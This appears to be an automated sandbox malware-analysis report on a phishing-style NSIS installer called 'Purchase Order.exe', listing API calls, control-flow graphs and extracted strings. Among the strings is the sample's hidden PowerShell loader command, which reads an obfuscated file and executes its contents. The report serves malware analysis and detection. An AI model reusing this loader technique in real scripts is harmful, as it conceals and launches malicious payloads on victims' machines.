                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                          • String ID: "$"$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$"C:\Users\user\Desktop\Purchase Order.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\potentially$C:\Users\user\AppData\Local\potentially\Avantgarders$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Low$Misguidingly Setup$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3329125770-2920167605
                                                          • Opcode ID: 7ee210cde1a7694cf5abc25b9eb613a289438676f60f8c8e8c044d7a1cf91141
                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                          • Opcode Fuzzy Hash: 7ee210cde1a7694cf5abc25b9eb613a289438676f60f8c8e8c044d7a1cf91141
                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                          Function 00405086 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 128 405086-4050a2 129 405231-405237 128->129 130 4050a8-40516f GetDlgItem * 3 call 403f49 call 4047e6 GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405261-40526d 129->132 133 405239-40525b GetDlgItem CreateThread FindCloseChangeNotification 129->133 152 405171-40518b SendMessageA * 2 130->152 153 40518d-405190 130->153 135 40528f-405295 132->135 136 40526f-405275 132->136 133->132 137 405297-40529d 135->137 138 4052ea-4052ed 135->138 140 4052b0-4052b7 call 403f7b 136->140 141 405277-40528a ShowWindow * 2 call 403f49 136->141 142 4052c3-4052d3 ShowWindow 137->142 143 40529f-4052ab call 403eed 137->143 138->140 146 4052ef-4052f5 138->146 149 4052bc-4052c0 140->149 141->135 150 4052e3-4052e5 call 403eed 142->150 151 4052d5-4052de call 404f48 142->151 143->140 146->140 154 4052f7-40530a SendMessageA 146->154 150->138 151->150 152->153 157 4051a0-4051b7 call 403f14 153->157 158 405192-40519e SendMessageA 153->158 159 405310-40533c CreatePopupMenu call 405d51 AppendMenuA 154->159 160 405407-405409 154->160 167 4051b9-4051cd ShowWindow 157->167 168 4051ed-40520e GetDlgItem SendMessageA 157->168 158->157 165 405351-405367 TrackPopupMenu 159->165 166 40533e-40534e GetWindowRect 159->166 160->149 165->160 169 40536d-405387 165->169 166->165 170 4051dc 167->170 171 4051cf-4051da ShowWindow 167->171 168->160 172 405214-40522c SendMessageA * 2 168->172 173 40538c-4053a7 SendMessageA 169->173 174 4051e2-4051e8 call 403f49 170->174 171->174 172->160 173->173 175 4053a9-4053c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 4053cb-4053eb SendMessageA 175->177 177->177 178 4053ed-405401 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040525B
                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                          • CloseClipboard.USER32 ref: 00405401
                                                          Strings
                                                          • Misguidingly Setup: Installing, xrefs: 00405376
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                          • String ID: Misguidingly Setup: Installing
                                                          • API String ID: 4154960007-1042532579
                                                          • Opcode ID: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                          • Opcode Fuzzy Hash: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                          Function 00405D51 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 423 405d51-405d5c 424 405d5e-405d6d 423->424 425 405d6f-405d84 423->425 424->425 426 405f77-405f7b 425->426 427 405d8a-405d95 425->427 428 405f81-405f8b 426->428 429 405da7-405db1 426->429 427->426 430 405d9b-405da2 427->430 431 405f96-405f97 428->431 432 405f8d-405f91 call 405d2f 428->432 429->428 433 405db7-405dbe 429->433 430->426 432->431 435 405dc4-405df9 433->435 436 405f6a 433->436 437 405f14-405f17 435->437 438 405dff-405e0a GetVersion 435->438 439 405f74-405f76 436->439 440 405f6c-405f72 436->440 443 405f47-405f4a 437->443 444 405f19-405f1c 437->444 441 405e24 438->441 442 405e0c-405e10 438->442 439->426 440->426 448 405e2b-405e32 441->448 442->441 445 405e12-405e16 442->445 449 405f58-405f68 lstrlenA 443->449 450 405f4c-405f53 call 405d51 443->450 446 405f2c-405f38 call 405d2f 444->446 447 405f1e-405f2a call 405c8d 444->447 445->441 451 405e18-405e1c 445->451 461 405f3d-405f43 446->461 447->461 453 405e34-405e36 448->453 454 405e37-405e39 448->454 449->426 450->449 451->441 457 405e1e-405e22 451->457 453->454 459 405e72-405e75 454->459 460 405e3b-405e56 call 405c16 454->460 457->448 464 405e85-405e88 459->464 465 405e77-405e83 GetSystemDirectoryA 459->465 469 405e5b-405e5e 460->469 461->449 463 405f45 461->463 470 405f0c-405f12 call 405f9a 463->470 467 405ef2-405ef4 464->467 468 405e8a-405e98 GetWindowsDirectoryA 464->468 466 405ef6-405ef9 465->466 466->470 473 405efb-405eff 466->473 467->466 471 405e9a-405ea4 467->471 468->467 472 405e64-405e6d call 405d51 469->472 469->473 470->449 476 405ea6-405ea9 471->476 477 405ebe-405ed4 SHGetSpecialFolderLocation 471->477 472->466 473->470 479 405f01-405f07 lstrcatA 473->479 476->477 480 405eab-405eb2 476->480 481 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 477->481 482 405eef 477->482 479->470 484 405eba-405ebc 480->484 481->466 481->482 482->467 484->466 484->477
                                                          APIs
                                                          • GetVersion.KERNEL32(?,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00404F80,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000), ref: 00405E02
                                                          • GetSystemDirectoryA.KERNEL32(Execute: ,00000400), ref: 00405E7D
                                                          • GetWindowsDirectoryA.KERNEL32(Execute: ,00000400), ref: 00405E90
                                                          • SHGetSpecialFolderLocation.SHELL32(?,0041859B), ref: 00405ECC
                                                          • SHGetPathFromIDListA.SHELL32(0041859B,Execute: ), ref: 00405EDA
                                                          • CoTaskMemFree.OLE32(0041859B), ref: 00405EE5
                                                          • lstrcatA.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                          • lstrlenA.KERNEL32(Execute: ,?,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00404F80,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000), ref: 00405F59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-1703369495
                                                          • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                          • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                          • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                          • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                          Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 485 4055d1-4055f7 call 40588f 488 405610-405617 485->488 489 4055f9-40560b DeleteFileA 485->489 491 405619-40561b 488->491 492 40562a-40563a call 405d2f 488->492 490 40579a-40579e 489->490 493 405621-405624 491->493 494 405748-40574d 491->494 500 405649-40564a call 4057e8 492->500 501 40563c-405647 lstrcatA 492->501 493->492 493->494 494->490 496 40574f-405752 494->496 498 405754-40575a 496->498 499 40575c-405764 call 406033 496->499 498->490 499->490 509 405766-40577a call 4057a1 call 405589 499->509 503 40564f-405652 500->503 501->503 505 405654-40565b 503->505 506 40565d-405663 lstrcatA 503->506 505->506 508 405668-405686 lstrlenA FindFirstFileA 505->508 506->508 510 40568c-4056a3 call 4057cc 508->510 511 40573e-405742 508->511 524 405792-405795 call 404f48 509->524 525 40577c-40577f 509->525 518 4056a5-4056a9 510->518 519 4056ae-4056b1 510->519 511->494 513 405744 511->513 513->494 518->519 521 4056ab 518->521 522 4056b3-4056b8 519->522 523 4056c4-4056d2 call 405d2f 519->523 521->519 527 4056ba-4056bc 522->527 528 40571d-40572f FindNextFileA 522->528 536 4056d4-4056dc 523->536 537 4056e9-4056f4 call 405589 523->537 524->490 525->498 530 405781-405790 call 404f48 call 405bea 525->530 527->523 533 4056be-4056c2 527->533 528->510 531 405735-405738 FindClose 528->531 530->490 531->511 533->523 533->528 536->528 538 4056de-4056e7 call 4055d1 536->538 545 405715-405718 call 404f48 537->545 546 4056f6-4056f9 537->546 538->528 545->528 547 4056fb-40570b call 404f48 call 405bea 546->547 548 40570d-405713 546->548 547->528 548->528
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                          • FindFirstFileA.KERNELBASE(0042A870,?,?,?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 004055D1
                                                          • \*.*, xrefs: 0040563C
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-976342130
                                                          • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                          • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                          Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(75923410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                          • FindClose.KERNELBASE(00000000), ref: 0040604A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                          • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                          • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                          • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                          Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                          • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                          • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                          • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                          Function 00403A41 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 196 403c51-403c6c 188->196 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 197 403ac2-403ac5 191->197 198 403aa8-403abd DestroyWindow 191->198 192->191 194->195 216 403c1b-403c3a SendMessageA 194->216 195->188 201 403ee1 195->201 202 403c75-403c7b 196->202 203 403c6e-403c70 call 40140b 196->203 207 403ac7-403ad3 SetWindowLongA 197->207 208 403ad8-403ade 197->208 205 403ebe-403ec4 198->205 204 403ee3-403eea 201->204 212 403c81-403c8c 202->212 213 403e9f-403eb8 DestroyWindow EndDialog 202->213 203->202 205->201 210 403ec6-403ecc 205->210 207->204 214 403b81-403b8f call 403f7b 208->214 215 403ae4-403af5 GetDlgItem 208->215 210->201 218 403ece-403ed7 ShowWindow 210->218 212->213 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 212->219 213->205 214->204 220 403b14-403b17 215->220 221 403af7-403b0e SendMessageA IsWindowEnabled 215->221 216->204 218->201 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 224 403b19-403b1a 220->224 225 403b1c-403b1f 220->225 221->201 221->220 227 403b4a-403b4f call 403eed 224->227 228 403b21-403b27 225->228 229 403b2d-403b32 225->229 227->214 230 403b68-403b7b SendMessageA 228->230 231 403b29-403b2b 228->231 229->230 232 403b34-403b3a 229->232 230->214 231->227 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->214 246 403b5c-403b66 235->246 245 403b48 236->245 245->227 246->245 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->196 267 403db4-403db6 258->267 267->196 268 403dbc-403dc0 267->268 269 403dc2-403dc8 